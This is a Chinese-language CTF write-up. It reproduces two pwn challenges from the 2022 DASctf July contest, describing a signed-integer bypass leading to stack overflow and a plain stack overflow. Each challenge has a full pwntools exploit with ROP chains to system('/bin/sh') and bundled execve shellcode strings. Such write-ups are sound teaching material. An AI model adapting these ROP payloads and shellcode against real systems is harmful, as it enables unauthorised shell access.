---
title: 2022 DASctf7月赋能赛 pwn 复现
date: 2022-07-29 12:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=38/
pin: false
published:
---

## eyfor

![image-20220729180427577](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220729180427577.png)

前边有几轮随机数判断，但要求不相同，就无所谓了。漏洞点在与vul函数的参数v4是int类型，输入负数能绕过if判断，从而实现栈溢出，题目自带system

![image-20220729180518959](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220729180518959.png)

![image-20220729180554644](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220729180554644.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
import random
from ctypes import *
# context.log_level='debug'
context(os="linux",arch="amd64")

p = process("./pwn4")
elf = ELF("./pwn4")
libc = elf.libc

def dbg(con=''):
    gdb.attach(p,con)
    # pause()
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

system = elf.plt['system']
pop_rdi = 0x0000000000400983
bin_sh = 0x6010C0
ret = 0x000000000040063e
# dbg()
sa("go",'\x00'*0x30)

libc1.srand(0)
# dbg("b *0x4008EA")
# dbg("b *0x4008D0")
sla("message:",libc1.rand())# 可以为任意可输入值
sla("message:",libc1.rand())
sla("message:",libc1.rand())
sla("message:",libc1.rand())

sl(0xFFFFFFFE)
sl('/bin/sh\x00'+'a'*0x30+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system))

p.interactive()
```

## Mycanary2

![image-20220729200237795](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220729200237795.png)

就是个栈溢出，控制栈上的信息正常返回即可

```python
# _*_ coding:utf-8 _*_
from pwn import *
import random
from ctypes import *
# context.log_level='debug'
context(os="linux",arch="amd64")

p = process("./MyCanary2")
elf = ELF("./MyCanary2")
libc = elf.libc

def dbg(con=''):
    gdb.attach(p,con)
    # pause()
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

pop_rdi = 0x0000000000401613
ret = pop_rdi+1
system = 0x401120

sla("Input your choice",1)
pay = 'a'*0x68+p32(0)+p32(0)+p64(0)+p64(ret)+p64(pop_rdi)+p64(0x4020F0)+p64(system)
p.sendafter("Show me the code:",pay)
sla("Input your choice",2)
sla("Input your choice",3)


p.interactive()
```

